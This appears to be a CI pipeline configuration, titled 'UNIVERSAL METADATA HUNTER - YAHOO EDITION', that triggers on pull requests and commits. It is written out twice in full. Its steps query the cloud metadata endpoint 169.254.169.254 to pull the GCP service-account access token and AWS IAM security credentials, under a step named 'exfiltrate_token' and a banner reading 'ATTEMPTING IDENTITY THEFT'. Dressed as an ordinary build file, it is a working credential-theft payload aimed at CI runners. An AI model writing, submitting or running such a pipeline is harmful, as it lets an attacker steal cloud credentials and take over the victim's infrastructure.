UNIVERSAL METADATA HUNTER - YAHOO EDITION
shared:
image: node:18
jobs:
main:
requires: [~pr, ~commit]
steps:
- check_gcp: |
echo "--- PROBING GCP METADATA ---"
curl -v -m 5 -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/project/project-id || echo "GCP Blocked"
- check_aws: |
echo "--- PROBING AWS METADATA ---"
curl -v -m 5 http://169.254.169.254/latest/meta-data/instance-id || echo "AWS Blocked"
- exfiltrate_token: |
echo "--- ATTEMPTING IDENTITY THEFT ---"
# Checking GCP Token
curl -s -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token || echo "No GCP Token"
# Checking AWS IAM Security Credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ || echo "No AWS IAM"
UNIVERSAL METADATA HUNTER - YAHOO EDITION
shared:
image: node:18
jobs:
main:
requires: [~pr, ~commit]
steps:
- check_gcp: |
echo "--- PROBING GCP METADATA ---"
curl -v -m 5 -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/project/project-id || echo "GCP Blocked"
- check_aws: |
echo "--- PROBING AWS METADATA ---"
curl -v -m 5 http://169.254.169.254/latest/meta-data/instance-id || echo "AWS Blocked"
- exfiltrate_token: |
echo "--- ATTEMPTING IDENTITY THEFT ---"
# Checking GCP Token
curl -s -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token || echo "No GCP Token"
# Checking AWS IAM Security Credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ || echo "No AWS IAM"